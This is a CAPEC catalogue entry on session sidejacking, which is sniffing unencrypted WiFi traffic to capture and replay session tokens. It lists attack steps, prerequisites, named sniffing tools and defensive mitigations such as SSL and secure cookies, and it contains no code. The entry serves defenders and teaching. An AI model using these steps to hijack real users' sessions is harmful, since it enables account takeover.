CAPEC-102 - Session Sidejacking

Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim.

This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.






  • Attack Methods 4
  • Time and State
  • Analysis
  • Spoofing
  • Protocol Manipulation
  • Purposes 1
  • Exploitation
  • Sec Principles 1
  • Protect Sensitive Data in Transit
  • Scopes 4
  • Gain privileges / assume identity
  • Authorization
  • Access_Control
  • Confidentiality
  • Modify memory
  • Integrity
  • Read memory
  • Confidentiality
  • DoS: instability
  • DoS: crash / exit / restart
  • Availability

Low level: Easy to use tools exist to automate this attack.

An attacker and the victim are both using the same WiFi network.

The victim has an active session with a target system.

The victim is not using a secure channel to communicate with the target system (e.g. SSL, VPN, etc.)

The victim initiated communication with a target system that requires transfer of the session token or the target application uses AJAX and thereby periodically "rings home" asynchronously using the session token

Low: A laptop and access to a public WiFi network.

Use available tools to snoop on communications between the victim and the target system and try to capture the transmitted session token

Use the captured session token to impersonate the victim on the target system to perform actions and view information on their behalf.

Step 1 - Detect Unprotected Session Token Transfer

The attacker sniffs on the wireless network to detect unencrypted traffic that contains session tokens..

Tecnique ID: 1 - Environment(s) env-Web

The attacker uses a network sniffer tool like ferret or hamster to monitor the wireless traffic at a WiFi hotspot while examining it for evidence of transmittal of session tokens in unencrypted or recognizably encrypted form. An attacker applies his knowledge of the manner by which session tokens are generated and transmitted by various target systems to identify the session tokens.

Indicator ID: 1 - Environment(s) env-Web env-ClientServer

Type: Positive

The attacker and the victim are both on the same WiFi network.

Indicator ID: 2 - Environment(s) env-Web env-ClientServer

Type: Positive

Traffic between the victim and targeted application is unencrypted.

Outcome ID: 1

Type: Success

The attacker sees session tokens in the unencrypted traffic

Step 1 - Capture session token

The attacker uses sniffing tools to capture a session token from traffic..

Step 2 - Insert captured session token

The attacker attempts to insert a captured session token into communication with the targeted application to confirm viability for exploitation..

Step 1 - Session Token Exploitation

The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim..

Ensure that SSL is used for all communication between the client and the target system where sensitive data and/or operations are available.

Ensure that session cookies are only transmitted via SSL pipes by setting the cookie's secure attribute to true.

Make sure that HTTPS is used to communicate with the target system. Alternatively, use VPN if possible. It is important to ensure that all communication between the client and the server happens via an encrypted secure channel.

Modify the session token with each transmission and protect it with cryptography. Add the idea of request sequencing that gives the server an ability to detect replay attacks.